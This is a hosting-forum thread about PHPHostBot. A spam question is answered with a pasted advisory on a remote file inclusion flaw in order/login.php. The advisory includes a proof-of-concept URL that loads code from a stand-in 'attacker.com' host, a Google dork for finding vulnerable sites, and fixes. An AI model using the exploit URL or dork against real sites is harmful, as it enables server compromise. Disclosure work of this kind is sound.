• Howdy! Welcome to our community of more than 130.000 members devoted to web hosting. This is a great place to get special offers from web hosts and post your own requests or ads. To start posting sign up here. Cheers! /Peo, FreeWebSpace.net
managed wordpress hosting

About:PHPHostBot

FeediaCo

FeediaCo

Active Member
Is there anyway I could have an image verification installed? Do they offer it? Because I get a lot of spammers and they create accounts and then don't use them. I can tell because the email addresses are my.email@gmail.com or something like that and their passwords are numbers. If there is an image verification then can someone provide me with a link?
 
PhpHostBot <= 1.06 (svr_rootscript) Remote File Inclusion Vulnerability
Vulnerability:
~~~~~~~~~~~~~

Input passed to the "svr_rootscript" parameter in order/login.php is not properly verified before being used to include files.
This can be exploited to include arbitrary files from local or external resources.
Successful exploitation requires that "register_globals" is enabled.


Poc/Exploit:
~~~~~~~~~

http://www.target.com/[PhpHostBot-path]/order/login.php?svr_rootscript=http://attacker.com/evil?

Google Dork:
~~~~~~~~~~
"order?page=plan_show"

Solution:
~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn off register_globals
- use the latest version
 
Could you explain things a little less "php"like? In terms I understand I do know php only a little bit.
 
You must log in or register to reply here.
Back
Top